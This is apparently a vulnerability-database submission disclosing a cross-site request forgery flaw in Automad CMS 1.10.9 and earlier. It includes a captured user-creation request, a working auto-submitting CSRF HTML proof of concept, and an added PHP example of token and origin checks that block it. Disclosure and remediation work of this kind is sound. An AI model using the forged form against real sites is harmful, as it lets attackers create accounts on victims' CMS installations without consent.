Submit #249818: Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF)

Title: Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF)
Description: After observation, it was discovered that the application does not implement CSRF tokens by default, making it vulnerable to CSRF attacks. This impacts the overall functionality of the application. Below is a view of one of the action requests while adding a user:

    POST /dashboard?controller=UserCollection::createUser HTTP/1.1
    Host: automad.scr
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 76
    Origin: http://automad.scr
    Connection: close
    Referer: http://automad.scr/dashboard?view=System
    Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
    X-PwnFox-Color: green

    username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd

CSRF HTML:

    <html>
      <body>
        <form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST">
          <input type="hidden" name="username" value="User" />
          <input type="hidden" name="email" value="User&#64;example&#46;com" />
          <input type="hidden" name="password1" value="Passw0rd" />
          <input type="hidden" name="password2" value="Passw0rd" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
Source: https://github.com/screetsec/VDD/tree/main/Automad%20CMS/Cross-Site%20Request%20Forgery%20(CSRF)
User: Maland (UID 59886)
Submission: 12/09/2023 18:15 (3 years ago)
Moderation: 12/21/2023 09:19 (12 days later)
Status: Accepted
VulDB entry: 248687 [automad up to 1.10.9 User Creation dashboard?controller=UserCollection::createUser cross-site request forgery]
Points: 20
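The root cause described in the submission is a state-changing dashboard action that accepts any session-bearing POST. The following is an added example of the standard fix (a per-session synchronizer token checked with a constant-time comparison, plus an Origin/Referer host check as defense in depth); it is not Automad's code, and the function names and the expected host `automad.scr` are assumptions for illustration.

```php
<?php
// Added example, not part of Automad: CSRF protection for a state-changing
// dashboard action such as UserCollection::createUser.
session_start();

// Issue (or reuse) one random token per session; the attacker's cross-site
// form cannot read it, so a forged POST cannot include the right value.
function csrfToken(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every legitimate dashboard form.
function csrfTokenField(): string {
    $token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

// Defense in depth: the browser sets Origin (or Referer) itself and a
// cross-site form cannot forge it. Fail closed when neither is present.
function originAllowed(string $expectedHost): bool {
    $source = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Call before handling any POST that changes state; rejects with 403.
function verifyCsrf(string $expectedHost): void {
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return;
    }
    $submitted = (string) ($_POST['csrf_token'] ?? '');
    $expected  = (string) ($_SESSION['csrf_token'] ?? '');
    // hash_equals() avoids timing leaks; an empty expected token also fails.
    if ($expected === '' || !hash_equals($expected, $submitted) || !originAllowed($expectedHost)) {
        http_response_code(403);
        header('Content-Type: application/json');
        echo json_encode(['error' => 'invalid CSRF token or request origin']);
        exit;
    }
}

verifyCsrf('automad.scr');   // assumed host; the PoC form above would now get 403
// ... proceed with the real user-creation logic using $_POST['username'], etc.
```

The PoC in the description fails both checks: the forged form carries no `csrf_token`, and its Origin is the attacker's page rather than `automad.scr`. Setting the session cookie with `SameSite=Lax` or `Strict` adds a third, browser-enforced layer.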
